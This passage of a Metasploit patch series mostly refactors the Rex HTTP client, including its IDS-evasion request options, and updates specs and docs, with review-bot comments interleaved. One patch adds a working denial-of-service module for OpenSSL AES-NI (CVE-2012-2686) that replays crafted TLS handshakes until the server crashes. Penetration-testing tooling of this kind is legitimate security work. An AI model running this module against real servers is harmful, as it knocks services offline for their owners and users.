@@ -37,13 +87,11 @@ class ClientRequest def initialize(opts={}) @cgi = (opts['cgi'].nil? ? true : opts['cgi']) - @config = opts['client_config'] || {} + @config = DefaultConfig.merge(opts['client_config'] || {}) @connection = opts['connection'] @content_type = opts['ctype'] @cookie = opts['cookie'] @data = opts['data'] || "" - @encode = opts['encode'] - @encode_params = opts['encode_params'] @headers = opts['headers'] || {} @host = opts['vhost'] @method = opts['method'] || "GET" @@ -51,28 +99,26 @@ class ClientRequest @port = opts['port'] || 80 @protocol = opts['proto'] || "HTTP" @query = opts['query'] || "" - @ssl = opts['ssl'] || false + @ssl = opts['ssl'] @raw_headers = opts['raw_headers'] || "" @uri = opts['uri'] @user_agent = opts['agent'] @vars_get = opts['vars_get'] || {} @vars_post = opts['vars_post'] || {} - @version = opts['version'] + @version = opts['version'] || "1.1" @opts = opts - config['chunked_size'] ||= 0 - config['pad_method_uri_count'] ||= 1 end def to_s - # Start GET query string - qstr = query + # Start GET query string + qstr = query.dup # Start POST data string pstr = data - if cgi == true + if cgi uri_str= set_cgi if (config['pad_get_params']) @@ -86,9 +132,9 @@ class ClientRequest vars_get.each_pair do |var,val| qstr << '&' if qstr.length > 0 - qstr << (encode_params ? set_encode_uri(var) : var) + qstr << (config['encode_params'] ? set_encode_uri(var) : var) qstr << '=' - qstr << (encode_params ? set_encode_uri(val) : val) + qstr << (config['encode_params'] ? set_encode_uri(val) : val) end if (config['pad_post_params']) 
@@ -96,21 +142,21 @@ class ClientRequest rand_var = Rex::Text.rand_text_alphanumeric(rand(32)+1) rand_val = Rex::Text.rand_text_alphanumeric(rand(32)+1) pstr << '&' if pstr.length > 0 - pstr << (encode_params ? set_encode_uri(rand_var) : rand_var) + pstr << (config['encode_params'] ? set_encode_uri(rand_var) : rand_var) pstr << '=' - pstr << (encode_params ? set_encode_uri(rand_val) : rand_val) + pstr << (config['encode_params'] ? set_encode_uri(rand_val) : rand_val) end end vars_post.each_pair do |var,val| pstr << '&' if pstr.length > 0 - pstr << (encode_params ? set_encode_uri(var) : var) + pstr << (config['encode_params'] ? set_encode_uri(var) : var) pstr << '=' - pstr << (encode_params ? set_encode_uri(val) : val) + pstr << (config['encode_params'] ? set_encode_uri(val) : val) end else uri_str = set_uri - if encode + if config['encode'] qstr = set_encode_uri(qstr) end end @@ -120,7 +166,7 @@ class ClientRequest req << set_method_uri_spacer() req << set_uri_prepend() - if encode + if config['encode'] req << set_encode_uri(uri_str) else req << uri_str diff --git a/lib/rex/text.rb b/lib/rex/text.rb index 9db91c0d8e..e9a46035ff 100644 --- a/lib/rex/text.rb +++ b/lib/rex/text.rb @@ -158,7 +158,7 @@ module Text # Converts ISO-8859-1 to UTF-8 # def self.to_utf8(str) - + if str.respond_to?(:encode) # Skip over any bytes that fail to convert to UTF-8 return str.encode('utf-8', { :invalid => :replace, :undef => :replace, :replace => '' }) @@ -550,7 +550,7 @@ module Text when 'u-half' return str.gsub(all) { |s| Rex::Text.to_hex(Rex::Text.to_unicode(s, 'uhwtfms-half'), '%u', 2) } else - raise TypeError, 'invalid mode' + raise TypeError, "invalid mode #{mode.inspect}" end end diff --git a/spec/lib/rex/proto/http/client_request_spec.rb b/spec/lib/rex/proto/http/client_request_spec.rb index 14d28e8001..154a1a9485 100644 --- a/spec/lib/rex/proto/http/client_request_spec.rb +++ b/spec/lib/rex/proto/http/client_request_spec.rb 
@@ -7,10 +7,8 @@ shared_context "with 'uri_dir_self_reference'" do client_request.config['uri_dir_self_reference'] = true end - describe "#set_uri" do - it "should return the unmodified uri" do - client_request.send(:set_uri).should == "/./" - end + it "should return the unmodified uri" do + client_request.send(:set_uri).should == "/./" end end @@ -21,10 +19,8 @@ shared_context "with no evasions" do client_request.config['uri_full_url'] = false end - describe "#set_uri" do - it "should return the unmodified uri" do - client_request.send(:set_uri).should == "/" - end + it "should return the unmodified uri" do + client_request.send(:set_uri).should == "/" end end 
@@ -166,17 +162,65 @@ describe Rex::Proto::Http::ClientRequest do context "with GET paramaters" do subject(:client_request) { options_with_params = default_options.merge({ - 'cgi' => true, - 'vars_get' => { - 'foo[]' => 'bar', - } + 'client_config' => { + 'uri_encode_mode' => encode_mode, + 'encode_params' => encode_params, + 'encode' => false, + }, + 'vars_get' => vars_get, }) Rex::Proto::Http::ClientRequest.new(options_with_params) } + # default + let(:encode_mode) { 'hex-normal' } - it "should contain the params" do - client_request.to_s.should include("foo[]=bar") + let(:vars_get) do + { + 'foo[]' => 'bar', + 'bar' => 'baz', + 'frobnicate' => 'the froozle?', + } end + + context "without 'encode_params'" do + let(:encode_params) { false } + it "should contain the unaltered params" do + str = client_request.to_s + str.should include("foo[]=bar") + str.should include("bar=baz") + str.should include("frobnicate=the froozle?") + end + end + + context "with 'encode_params'" do + let(:encode_params) { true } + context "with 'uri_encode_mode' = default (hex-normal)" do + it "should encode special chars" do + str = client_request.to_s + str.should include("foo%5b%5d=bar") + str.should include("bar=baz") + str.should include("frobnicate=the%20froozle%3f") + end + end + + context "with 'uri_encode_mode' = hex-all" do + let(:encode_mode) { 'hex-all' } + it "should encode all chars" do + str = client_request.to_s + str.should include("%66%6f%6f%5b%5d=%62%61%72") + str.should include("%62%61%72=%62%61%7a") + str.should include("%66%72%6f%62%6e%69%63%61%74%65=%74%68%65%20%66%72%6f%6f%7a%6c%65%3f") + end + end + + describe "#to_s" do + it "should produce same values if called multiple times with same options" do + client_request.to_s.should == client_request.to_s + end + end + + end + end describe "#set_uri" do From 7a7dd8975f4125dda67d7499cc12f47f71691e10 Mon Sep 17 00:00:00 2001 
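Review bot: The new `#to_s` idempotence example runs only inside the `with 'encode_params'` context and only with `vars_get`, so the POST side of `to_s`, which appends to its body string in the same way, is not exercised. As written the example would pass even if repeated calls kept growing the request body. Adding a sibling subject with `'vars_post' => { 'a' => 'b' }` (constructed values) and repeating `client_request.to_s.should == client_request.to_s` would cover the body as well.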
From: James Lee Date: Tue, 26 Feb 2013 18:16:44 -0600 Subject: [PATCH 42/87] Hmm, turns out something actually used that Despite comments to the contrary --- lib/rex/proto/http/client.rb | 30 ++++++++++++++++++++++++++++ lib/rex/proto/http/client_request.rb | 2 +- 2 files changed, 31 insertions(+), 1 deletion(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 2912065309..f3073ca530 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -45,6 +45,36 @@ class Client 'agent' => DefaultUserAgent, }.merge(Http::ClientRequest::DefaultConfig) + self.config_types = { + 'uri_encode_mode' => ['hex-normal', 'hex-all', 'hex-random', 'u-normal', 'u-random', 'u-all'], + 'uri_encode_count' => 'integer', + 'uri_full_url' => 'bool', + 'pad_method_uri_count' => 'integer', + 'pad_uri_version_count' => 'integer', + 'pad_method_uri_type' => ['space', 'tab', 'apache'], + 'pad_uri_version_type' => ['space', 'tab', 'apache'], + 'method_random_valid' => 'bool', + 'method_random_invalid' => 'bool', + 'method_random_case' => 'bool', + 'version_random_valid' => 'bool', + 'version_random_invalid' => 'bool', + 'version_random_case' => 'bool', + 'uri_dir_self_reference' => 'bool', + 'uri_dir_fake_relative' => 'bool', + 'uri_use_backslashes' => 'bool', + 'pad_fake_headers' => 'bool', + 'pad_fake_headers_count' => 'integer', + 'pad_get_params' => 'bool', + 'pad_get_params_count' => 'integer', + 'pad_post_params' => 'bool', + 'pad_post_params_count' => 'integer', + 'uri_fake_end' => 'bool', + 'uri_fake_params_start' => 'bool', + 'header_folding' => 'bool', + 'chunked_size' => 'integer' + } + + end # diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index 68c3aa5f48..1b55784e99 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -116,7 +116,7 @@ class ClientRequest qstr = query.dup # Start POST data string - pstr = data + pstr = data.dup if cgi uri_str= set_cgi 
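Review bot: The restored `config_types` table is a second hand-maintained list next to `ClientRequest::DefaultConfig`, and the two already differ: `DefaultConfig` carries `'encode_params'` and `'encode'`, which have no entry here. How the table is consumed is not visible in this hunk, but if it is used to coerce or validate option values, those two keys would bypass it. Either add `'encode_params' => 'bool'` and `'encode' => 'bool'`, or put a comment above the table naming the caller that depends on it so the two lists are kept in step.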
From 724b32af1744d891b5fa629d460162b0942ba3b6 Mon Sep 17 00:00:00 2001 From: Gerry Eisenhaur Date: Tue, 26 Feb 2013 16:55:26 -0800 Subject: [PATCH 43/87] Fixed the importing of NBE files --- lib/msf/core/db.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/lib/msf/core/db.rb b/lib/msf/core/db.rb index 7e0bc736ba..9b5c8d8212 100644 --- a/lib/msf/core/db.rb +++ b/lib/msf/core/db.rb @@ -5163,11 +5163,11 @@ class DBManager # There is no place the NBE actually stores the plugin name used to # scan. You get "Security Note" or "Security Warning," and that's it. def import_nessus_nbe(args={}, &block) - data = args[:data] + nbe_data = args[:data] wspace = args[:wspace] || workspace bl = validate_ips(args[:blacklist]) ? args[:blacklist].split : [] - nbe_copy = data.dup + nbe_copy = nbe_data.dup # First pass, just to build the address map. addr_map = {} @@ -5183,7 +5183,7 @@ class DBManager addr_map[hname] = addr end - data.each_line do |line| + nbe_data.each_line do |line| r = line.split('|') next if r[0] != 'results' hname = r[2] From e7015985e7234fb6bdde3d2b0a41ed6cfacf1107 Mon Sep 17 00:00:00 2001 From: Wolfgang Ettlinger Date: Wed, 27 Feb 2013 22:57:53 +0100 Subject: [PATCH 44/87] Added CVE-2012-2686 Added Module for a DoS issue in OpenSSL (pre 1.0.1d). Can be exploited with services that use TLS >= 1.1 and AES-NI. Because of improper length computation, an integer underflow occurs leading to a segmentation fault. This module brute-forces serveral encrypted messages - when the decrypted message coincidentally specifies a certain value for the size, the integer underflow occurs. Though this could be accomplished more effectively (e.g. implementing or maninpulating and TLS implementation), this module still does what it should do. --- modules/auxiliary/dos/ssl/openssl_aesni.rb | 169 +++++++++++++++++++++ 1 file changed, 169 insertions(+) create mode 100644 modules/auxiliary/dos/ssl/openssl_aesni.rb 
diff --git a/modules/auxiliary/dos/ssl/openssl_aesni.rb b/modules/auxiliary/dos/ssl/openssl_aesni.rb new file mode 100644 index 0000000000..d05134f4de --- /dev/null +++ b/modules/auxiliary/dos/ssl/openssl_aesni.rb 
@@ -0,0 +1,169 @@ +# auxilary/dos/ssl/openssl_aesni +require 'msf/core' + +class Metasploit4 < Msf::Auxiliary + include Msf::Exploit::Remote::Tcp + include Msf::Auxiliary::Dos + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'OpenSSL TLS 1.1 and 1.2 AES-NI DoS', + 'Description' => %q{ + The AES-NI implementation of OpenSSL 1.0.1c does not + properly compute the length of an encrypte message when used + with a TLS version 1.1 or above. This leads to an integer + underflow which can cause a DoS. + }, + 'Author' => [ + 'Wolfgang Ettlinger ' + ], + 'License' => BSD_LICENSE, + 'References' => + [ + [ 'CVE', '2012-2686'], + [ 'URL', 'https://www.openssl.org/news/secadv_20130205.txt'] + ], + 'DisclosureDate' => 'Feb 05 2013')) + + register_options( + [ + Opt::RPORT(443), + OptInt.new('MAX_TRIES', [false, "Maximum number of tries", 300]) + ], self.class) + end + + def run + # Client Hello + p1 = + "\x16\x03\x01\x00\x7e\x01\x00\x00\x7a\x03\x02\x50\xeb\xf2\x4a\xaf"<< + "\x74\xf5\xe3\x55\x6a\xae\xcf\x88\x36\x7c\xd9\xe5\x1b\xcc\x09\xee"<< + "\x6f\x42\x30\x3b\x49\x55\xf8\xaa\x11\x32\xeb\x00\x00\x08\xc0\x13"<< + "\x00\x39\x00\x35\x00\xff\x01\x00\x00\x49\x00\x0b\x00\x04\x03\x00"<< + "\x01\x02\x00\x0a\x00\x34\x00\x32\x00\x0e\x00\x0d\x00\x19\x00\x0b"<< + "\x00\x0c\x00\x18\x00\x09\x00\x0a\x00\x16\x00\x17\x00\x08\x00\x06"<< + "\x00\x07\x00\x14\x00\x15\x00\x04\x00\x05\x00\x12\x00\x13\x00\x01"<< + "\x00\x02\x00\x03\x00\x0f\x00\x10\x00\x11\x00\x23\x00\x00\x00\x0f"<< + "\x00\x01\x01" + + # Client Key Exchange, Change Cipher Spec, Encrypted Handshake + # AES256-SHA + p2_aes_sha = + "\x16\x03\x02\x01\x06\x10\x00\x01\x02\x01\x00\x4c\xee\x18\xe2\xec"<< + "\xa9\x9d\xd7\x10\xd0\xff\x6f\xa8\x10\xf5\x9c\xa0\x91\x38\x93\x93"<< + "\xaa\x71\x07\x69\xb6\x22\x81\x2d\xcd\xe0\x8f\x95\xf2\x9b\xaa\x49"<< + "\x18\x15\x53\xc3\x34\x15\x81\xab\x20\x72\x16\x5b\xf2\xca\x13\x9e"<< + "\x11\x6e\x3c\xf5\x71\x7c\x19\xf4\x7d\x35\x71\x25\x6e\xbe\xee\xdf"<< + 
"\x1d\x55\xc9\x38\xac\xbb\x88\xab\xd0\x18\x7d\x5f\xaa\x3c\x91\x2f"<< + "\xd2\x64\x7c\x15\x91\xa6\xe7\xb7\x0c\x01\xb3\xc7\x37\xc1\x3a\xb2"<< + "\xde\x59\x6e\x8f\x7a\xde\x22\x59\x6c\xb7\x91\x21\x8f\xff\x56\x2c"<< + "\x5f\xfb\x54\x7f\xd1\x1a\x00\x0e\x02\xb2\x4e\x62\xfd\xe2\xc0\x8f"<< + "\x56\x52\x8a\x4c\x44\x01\x5f\x21\xf9\xd5\xb3\xeb\xab\x39\xcf\x4e"<< + "\xed\x78\xad\xea\xc7\x43\x80\x3f\xf2\x41\xbe\x5c\x83\xa5\x54\x6f"<< + "\x3c\xfb\x15\xed\x3c\x83\xf0\x3b\xd2\x7c\x5d\xf6\x82\xcb\x82\xb6"<< + "\x6a\x8e\x94\xf9\x22\x5a\x17\x20\x82\x21\x4e\x83\x01\x81\x06\x9e"<< + "\x21\xba\x16\xa4\xda\xcd\x8e\x1c\x8c\xe7\x19\x96\x2a\xec\x90\x6a"<< + "\x16\xac\x12\x68\xbd\xf7\x4b\x6c\x3c\x91\x8b\xe7\x34\x03\x91\x65"<< + "\x61\x57\xbc\x3a\x66\x3b\x7b\xb1\x57\xcd\x19\x5c\x4a\x69\x43\xb2"<< + "\x67\xaf\x38\x5c\x1a\x7e\x80\x78\x90\x25\xb8\x14\x03\x02\x00\x01"<< + "\x01\x16\x03\x02\x00\x40\x7d\xf4\x2c\x8c\x64\x74\xa5\x98\x02\x41"<< + "\xac\x97\xfd\x53\x15\x4c\xbf\x16\x08\x26\xe0\x6c\x22\x70\x5f\x36"<< + "\x75\x75\x96\xf9\x6b\x9f\xb4\xc3\x38\xa7\x14\xac\x21\x89\xec\xd6"<< + "\x37\x28\xf3\x0d\xdf\xb3\x1b\xac\x96\xf3\x16\x5c\xc3\x6b\x71\x1c"<< + "\xdb\x0d\x04\x96\x21\xd2" + + # DHE-RSA-AES256-SHA + p2_dhe_rsa_aes256_sha = + "\x16\x03\x02\x00\x46\x10\x00\x00\x42\x00\x40\x43\xaf\x48\x16\x8d"<< + "\x17\xb9\xb0\xb6\xbc\x68\xab\x99\xf9\x30\xc9\xb1\xa2\x3b\x4f\x79"<< + "\xaa\x76\x5c\x0d\x61\xa0\x19\x55\x11\x20\xe8\xbb\xab\x69\xf3\xeb"<< + "\xff\x81\x1d\x16\x0d\x03\xaf\xb9\x70\xae\x72\x5c\xd8\xc7\x28\x2c"<< + "\xac\xd5\x84\x2c\xaf\x2a\x57\x46\x71\xca\x73\x14\x03\x02\x00\x01"<< + "\x01\x16\x03\x02\x00\x40\xff\x62\x0f\x7a\xb2\x79\xfe\x78\xce\xb9"<< + "\xde\xc4\xef\x66\x2f\xed\x1a\x37\xfe\x47\xdd\xde\x9c\xe0\x42\xbc"<< + "\x93\x20\x65\x05\xd3\x50\x14\x1c\x6c\xb1\x7a\x3a\x7d\x91\x92\xbb"<< + "\x9d\x42\x78\xbf\xe4\x08\xa0\xfd\x9c\xeb\x24\x29\x3b\xed\xc8\x54"<< + "\x3d\xd3\xa2\xff\xb0\x8b" + + # ECDHE-RSA-AES128-SHA + p2_ecdhe_rsa_aes128_sha = + 
"\x16\x03\x02\x00\x46\x10\x00\x00\x42\x41\x04\x2f\x22\xf4\x06\x3f"<< + "\xa1\xf7\x3d\xb6\x55\xbc\x68\x65\x57\xd8\x03\xe5\xaa\x36\xeb\x0f"<< + "\x52\x5a\xaf\xd0\x9f\xf8\xc7\xfe\x09\x69\x5b\x38\x95\x58\xb6\x0d"<< + "\x27\x53\xe9\x63\xcb\x96\xb3\x54\x47\xa6\xb2\xe6\x8b\x2a\xd9\x03"<< + "\xb4\x85\x46\xd9\x1c\x5f\xd1\xf7\x7b\x73\x40\x14\x03\x02\x00\x01"<< + "\x01\x16\x03\x02\x00\x40\x8c\xc6\x4d\xdc\x42\x03\x64\xa3\xc0\xf4"<< + "\x94\xda\xa4\x12\x68\x78\xfd\x5b\x44\xaf\xa3\x91\x63\x75\x26\x93"<< + "\x14\xad\x86\xa7\x4f\x5a\x2e\xcb\x13\x17\xb7\xdf\x67\x64\x1b\x10"<< + "\xc3\x9f\x68\xaf\x92\x38\xbf\x67\xc6\x18\x5b\x78\xc9\x99\xc3\x70"<< + "\x89\x09\xe2\x3f\x3e\x1f" + + maxtries = datastore['MAX_TRIES'] + + success = false + + for i in 0..maxtries + print_status("Try \##{i}") + + connect + + sock.put(p1) + resp = sock.recv(4096) + + cs = get_cipher_suite(resp) + + if cs == 0xc013 # ECDHE-RSA-AES128-SHA + p2 = p2_ecdhe_rsa_aes128_sha + elsif cs == 0x0039 # DHE-RSA-AES256-SHA + p2 = p2_dhe_rsa_aes256_sha + elsif cs == 0x0035 # AES256-SHA + p2 = p2_aes_sha + else + print_error("No common ciphers!") + return + end + + sock.put(p2) + + alert = nil + + timeout(2) do + alert = sock.recv(4096) + end + + disconnect + + if alert == '' + print_status("DoS successful. process on #{rhost} did not respond.") + success = true + break + end + end + + if success == false + print_status("DoS unsuccessful.") + end + end + + def get_cipher_suite(resp) + offset = 0 + + while offset < resp.length + type = (resp[offset, 1]).unpack("C")[0] + + if not type == 22 # Handshake + return nil + end + + len = (resp[offset+3, 2]).unpack("n")[0] + hstype = (resp[offset+5, 1]).unpack("C")[0] + + if hstype == 2 + return (resp[offset+44, 2]).unpack("n")[0] + end + + offset += len + end + + end +end + From d5ae54cbb64b3e1db831d07f9840226dd27a228e Mon Sep 17 00:00:00 2001 
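Review bot: The module's `Description` names only OpenSSL 1.0.1c, while the commit message scopes the issue to releases before 1.0.1d; the description should say the same so a reader can tell at a glance whether a given build is still affected. A closing sentence such as `Versions before 1.0.1d are affected.` would do, and `encrypte message` in the same text should read `encrypted message`. The leading file comment `# auxilary/dos/ssl/openssl_aesni` also misspells the directory the file is created in. `get_cipher_suite` has no comment at all; a line stating that it returns the suite chosen in the Server Hello, or nil when the record is not a handshake or no Server Hello is found, would document the implicit nil at the end of the loop.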
From: James Lee Date: Wed, 27 Feb 2013 16:27:37 -0600 Subject: [PATCH 45/87] More accurate docs --- lib/rex/proto/http/client.rb | 22 +++++++++++++++------- 1 file changed, 15 insertions(+), 7 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index f3073ca530..5402b3ba3e 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -254,6 +254,7 @@ class Client # If the request is a 401, and we have creds, it will attempt to complete # authentication and return the final response # + # @return (see #_send_recv) def send_recv(req, t = -1, persist=false) res = _send_recv(req,t,persist) if res and res.code == 401 and res.headers['WWW-Authenticate'] @@ -271,7 +272,7 @@ class Client # Call this directly instead of {#send_recv} if you don't want automatic # authentication handling. # - # @return [Response] + # @return (see #read_response) def _send_recv(req, t = -1, persist=false) @pipeline = persist send_request(req, t) @@ -286,6 +287,7 @@ class Client # @param req [Request,ClientRequest,#to_s] The request to send # @param t (see #connect) # + # @return [void] def send_request(req, t = -1) connect(t) conn.put(req.to_s) @@ -299,6 +301,7 @@ class Client # @param opts [Hash] the options used to generate the original HTTP request # @param t [Fixnum] the timeout for the request in seconds # @param persist [Boolean] whether or not to persist the TCP connection (pipelining) + # # @return [Response] the last valid HTTP response object we received def send_auth(res, opts, t, persist) if opts['username'].nil? or opts['username'] == '' 
@@ -352,15 +355,19 @@ class Client return res end - # Converts username and password into the HTTP Basic - # authorization string. + # Converts username and password into the HTTP Basic authorization + # string. + # + # @return [String] A value suitable for use as an Authorization header def basic_auth_header(username,password) auth_str = username.to_s + ":" + password.to_s auth_str = "Basic " + Rex::Text.encode_base64(auth_str) end # Send a series of requests to complete Digest Authentication + # # @param opts [Hash] the options used to build an HTTP request + # # @return [Response] the last valid HTTP response we received def digest_auth(opts={}) @nonce_count = 0 @@ -495,14 +502,14 @@ class Client end end - # - # Opts - - # Inherits all the same options as send_request_cgi - # provider - What Negotiate Provider to use (supports NTLM and Negotiate) # # Builds a series of requests to complete Negotiate Auth. Works essentially # the same way as Digest auth. Same pipelining concerns exist. # + # @option opts (see #send_request_cgi) + # @option opts provider ["Negotiate","NTLM"] What Negotiate provider to use + # + # @return [Response] the last valid HTTP response we received def negotiate_auth(opts={}) ntlm_options = { :signing => false, @@ -608,6 +615,7 @@ class Client # # Read a response from the server # + # @return [Response] def read_response(t = -1, opts = {}) resp = Response.new From 5606db3f9ca93da80aebe24c0a5139f32c9cb951 Mon Sep 17 00:00:00 2001 From: James Lee Date: Wed, 27 Feb 2013 16:28:17 -0600 Subject: [PATCH 46/87] Re-enable some commented tests --- spec/lib/rex/proto/http/client_spec.rb | 29 +++++++++++++++----------- 1 file changed, 17 insertions(+), 12 deletions(-) diff --git a/spec/lib/rex/proto/http/client_spec.rb b/spec/lib/rex/proto/http/client_spec.rb index d216c75325..8dc10b8c46 100644 --- a/spec/lib/rex/proto/http/client_spec.rb +++ b/spec/lib/rex/proto/http/client_spec.rb 
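Review bot: In the `negotiate_auth` comment, the new `# @option opts provider ["Negotiate","NTLM"] ...` line does not follow YARD's `@option` layout, which expects the type list before the key, so the generated docs will likely show the key and type garbled. `# @option opts [String] 'provider' What Negotiate provider to use ("Negotiate" or "NTLM")` keeps the same information in the order YARD parses. The method body continues below this hunk.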
@@ -43,8 +43,8 @@ describe Rex::Proto::Http::Client do cli.instance_variable_get(:@context).should == {} cli.instance_variable_get(:@ssl).should be_false cli.instance_variable_get(:@proxies).should be_nil - # cli.instance_variable_get(:@username).should be_empty - # cli.instance_variable_get(:@password).should be_empty + cli.instance_variable_get(:@username).should be_empty + cli.instance_variable_get(:@password).should be_empty cli.config.should be_a_kind_of Hash end @@ -53,7 +53,11 @@ describe Rex::Proto::Http::Client do end it "should produce a CGI HTTP request" do - cli.request_cgi.should be_a_kind_of Rex::Proto::Http::ClientRequest + req = cli.request_cgi + req.should be_a_kind_of Rex::Proto::Http::ClientRequest + + req.port.should == 80 + req.ssl.should be_false end it "should attempt to connect to a server" do @@ -78,15 +82,16 @@ describe Rex::Proto::Http::Client do end it "should test for credentials" do - # cli.should_not have_creds - # this_cli = Rex::Proto::Http::Client.new("127.0.0.1", 1, {}, false, nil, nil, "user1", "pass1" ) - # this_cli.should have_creds - pending "Should actually respond to :has_creds" + pending "Should actually respond to :has_creds" do + cli.should_not have_creds + this_cli = described_class.new("127.0.0.1", 1, {}, false, nil, nil, "user1", "pass1" ) + this_cli.should have_creds + end end it "should send authentication", :pending => excuse_needs_connection - it "should produce a basic authentication header", :pending => "Waiting for #1500" do + it "should produce a basic authentication header" do u = "user1" p = "pass1" b64 = ["#{u}:#{p}"].pack("m*").strip @@ -114,10 +119,10 @@ describe Rex::Proto::Http::Client do end it "should tell if pipelining is enabled" do - cli.pipelining?.should be_false + cli.should_not be_pipelining this_cli = Rex::Proto::Http::Client.new("127.0.0.1", 1) this_cli.pipeline = true - this_cli.pipelining?.should be_true + this_cli.should be_pipelining end it "should respond to its various accessors" do 
@@ -129,8 +134,8 @@ describe Rex::Proto::Http::Client do cli.should respond_to :conn cli.should respond_to :context cli.should respond_to :proxies - # cli.should respond_to :username - # cli.should respond_to :password + cli.should respond_to :username + cli.should respond_to :password cli.should respond_to :junk_pipeline # These are supposed to be protected cli.should respond_to :ssl From 4edd46216f32d4c0009aadf8204b8bb4fcc8af89 Mon Sep 17 00:00:00 2001 From: James Lee Date: Wed, 27 Feb 2013 17:29:26 -0600 Subject: [PATCH 47/87] Refactor config -> opts Puts all the evasion stuff in the same place as regular HTTP options to make it easier to deal with. --- lib/rex/proto/http/client.rb | 3 - lib/rex/proto/http/client_request.rb | 201 ++++++++---------- .../lib/rex/proto/http/client_request_spec.rb | 32 ++- spec/lib/rex/proto/http/client_spec.rb | 2 - 4 files changed, 103 insertions(+), 135 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 5402b3ba3e..b10af20c3c 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -23,7 +23,6 @@ module Http ### class Client - DefaultUserAgent = Rex::Proto::Http::ClientRequest::DefaultUserAgent # # Creates a new client instance @@ -41,8 +40,6 @@ class Client self.config = { 'read_max_data' => (1024*1024*1), 'vhost' => self.hostname, - 'version' => '1.1', - 'agent' => DefaultUserAgent, }.merge(Http::ClientRequest::DefaultConfig) self.config_types = { diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index 1b55784e99..31933fe5f7 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb 
@@ -14,6 +14,25 @@ class ClientRequest DefaultUserAgent = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" DefaultConfig = { + # + # Regular HTTP stuff + # + 'agent' => DefaultUserAgent, + 'cgi' => true, + 'cookie' => nil, + 'data' => '', + 'headers' => {}, + 'raw_headers' => '', + 'method' => 'GET', + 'path_info' => '', + 'port' => 80, + 'proto' => 'HTTP', + 'ssl' => false, + 'uri' => '/', + 'vars_get' => {}, + 'vars_post' => {}, + 'version' => '1.1', + # # Evasion options # @@ -45,6 +64,7 @@ class ClientRequest 'uri_fake_params_start' => false, # bool 'header_folding' => false, # bool 'chunked_size' => 0, # integer + # # NTLM Options # 
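Review bot: The `{}` values added to `DefaultConfig` for `'headers'`, `'vars_get'` and `'vars_post'` are single mutable objects, and `DefaultConfig.merge(opts)` in the `initialize` hunk further down is a shallow copy, so every request built without its own `'headers'` shares one Hash with the constant. Any in-place write to `opts['headers']`, such as the `opts['headers']['Authorization'] = ...` assignment in the client.rb `send_auth` hunk later in this series, could then put a credential header on unrelated requests; whether that code receives the shared Hash is not fully visible here. Copying in `initialize` avoids it, `@opts['headers'] = @opts['headers'].dup`, and freezing the nested defaults (`'headers' => {}.freeze`) would make an accidental in-place write fail loudly.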
@@ -61,68 +81,25 @@ class ClientRequest 'DigestAuthIIS' => true } - attr_accessor :authorization - attr_accessor :cgi - attr_accessor :config - attr_accessor :connection - attr_accessor :content_type - attr_accessor :cookie - attr_accessor :data - attr_accessor :headers - attr_accessor :host - attr_accessor :method - attr_accessor :path - attr_accessor :port - attr_accessor :protocol - attr_accessor :query - attr_accessor :raw_headers - attr_accessor :ssl - attr_accessor :uri - attr_accessor :user_agent - attr_accessor :vars_get - attr_accessor :vars_post - attr_accessor :version - attr_reader :opts def initialize(opts={}) - @cgi = (opts['cgi'].nil? ? true : opts['cgi']) - @config = DefaultConfig.merge(opts['client_config'] || {}) - @connection = opts['connection'] - @content_type = opts['ctype'] - @cookie = opts['cookie'] - @data = opts['data'] || "" - @headers = opts['headers'] || {} - @host = opts['vhost'] - @method = opts['method'] || "GET" - @path = opts['path_info'] - @port = opts['port'] || 80 - @protocol = opts['proto'] || "HTTP" - @query = opts['query'] || "" - @ssl = opts['ssl'] - @raw_headers = opts['raw_headers'] || "" - @uri = opts['uri'] - @user_agent = opts['agent'] - @vars_get = opts['vars_get'] || {} - @vars_post = opts['vars_post'] || {} - @version = opts['version'] || "1.1" - @opts = opts - + @opts = DefaultConfig.merge(opts) end def to_s # Start GET query string - qstr = query.dup + qstr = opts['query'] ? opts['query'].dup : "" # Start POST data string - pstr = data.dup + pstr = opts['data'] ? opts['data'].dup : "" - if cgi + if opts['cgi'] uri_str= set_cgi - if (config['pad_get_params']) - 1.upto(config['pad_get_params_count'].to_i) do |i| + if (opts['pad_get_params']) + 1.upto(opts['pad_get_params_count'].to_i) do |i| qstr << '&' if qstr.length > 0 qstr << set_encode_uri(Rex::Text.rand_text_alphanumeric(rand(32)+1)) qstr << '=' 
@@ -130,33 +107,33 @@ class ClientRequest end end - vars_get.each_pair do |var,val| + opts['vars_get'].each_pair do |var,val| qstr << '&' if qstr.length > 0 - qstr << (config['encode_params'] ? set_encode_uri(var) : var) + qstr << (opts['encode_params'] ? set_encode_uri(var) : var) qstr << '=' - qstr << (config['encode_params'] ? set_encode_uri(val) : val) + qstr << (opts['encode_params'] ? set_encode_uri(val) : val) end - if (config['pad_post_params']) - 1.upto(config['pad_post_params_count'].to_i) do |i| + if (opts['pad_post_params']) + 1.upto(opts['pad_post_params_count'].to_i) do |i| rand_var = Rex::Text.rand_text_alphanumeric(rand(32)+1) rand_val = Rex::Text.rand_text_alphanumeric(rand(32)+1) pstr << '&' if pstr.length > 0 - pstr << (config['encode_params'] ? set_encode_uri(rand_var) : rand_var) + pstr << (opts['encode_params'] ? set_encode_uri(rand_var) : rand_var) pstr << '=' - pstr << (config['encode_params'] ? set_encode_uri(rand_val) : rand_val) + pstr << (opts['encode_params'] ? set_encode_uri(rand_val) : rand_val) end end - vars_post.each_pair do |var,val| + opts['vars_post'].each_pair do |var,val| pstr << '&' if pstr.length > 0 - pstr << (config['encode_params'] ? set_encode_uri(var) : var) + pstr << (opts['encode_params'] ? 